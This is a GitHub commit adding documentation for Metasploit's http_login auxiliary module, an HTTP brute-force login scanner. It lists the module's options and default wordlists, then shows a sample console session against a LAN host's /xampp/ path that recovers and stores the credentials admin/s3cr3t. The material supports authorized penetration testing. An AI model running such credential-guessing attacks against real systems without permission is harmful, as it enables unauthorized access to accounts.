Skip to content

Commit d32edfd

Browse files
committed
Documentation for http_login
1 parent ba0b270 commit d32edfd

File tree

1 file changed

+66
-0
lines changed

1 file changed

+66
-0
lines changed
Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
## Description
2+
3+
This module attempts to authenticate to an HTTP service. It is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
4+
5+
## Verification Steps
6+
7+
1. Do: ```use auxiliary/scanner/http/http_login```
8+
2. Do: ```set RHOSTS [IP]```
9+
3. Do: ```set RPORT [PORT]```
10+
4. Do: ```run```
11+
12+
## Scenarios
13+
14+
```
15+
msf > use auxiliary/scanner/http/http_login
16+
msf auxiliary(http_login) > show options
17+
18+
Module options (auxiliary/scanner/http/http_login):
19+
20+
Name Current Setting Required Description
21+
---- --------------- -------- -----------
22+
AUTH_URI no The URI to authenticate against (default:auto)
23+
BLANK_PASSWORDS false no Try blank passwords for all users
24+
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
25+
DB_ALL_CREDS false no Try each user/password couple stored in the current database
26+
DB_ALL_PASS false no Add all passwords in the current database to the list
27+
DB_ALL_USERS false no Add all users in the current database to the list
28+
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
29+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
30+
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
31+
RHOSTS yes The target address range or CIDR identifier
32+
RPORT 80 yes The target port (TCP)
33+
SSL false no Negotiate SSL/TLS for outgoing connections
34+
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
35+
THREADS 1 yes The number of concurrent threads
36+
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
37+
USER_AS_PASS false no Try the username as the password for all users
38+
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
39+
VERBOSE true yes Whether to print output for all attempts
40+
VHOST
41+
msf auxiliary(http_login) > set AUTH_URI /xampp/
42+
AUTH_URI => /xampp/
43+
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
44+
RHOSTS => 192.168.1.201
45+
msf auxiliary(http_login) > set VERBOSE false
46+
VERBOSE => false
47+
msf auxiliary(http_login) > run
48+
49+
[*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
50+
[+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
51+
[*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
52+
[*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
53+
[*] Scanned 1 of 1 hosts (100% complete)
54+
[*] Auxiliary module execution completed
55+
msf auxiliary(http_login) >
56+
57+
msf auxiliary(http_login) > creds
58+
Credentials
59+
===========
60+
61+
host origin service public private realm private_type
62+
---- ------ ------- ------ ------- ----- ------------
63+
192.168.1.201 192.168.1.201 80/tcp (http) admin s3cr3t Password
64+
65+
msf auxiliary(http_login) >
66+
```

0 commit comments

Comments
 (0)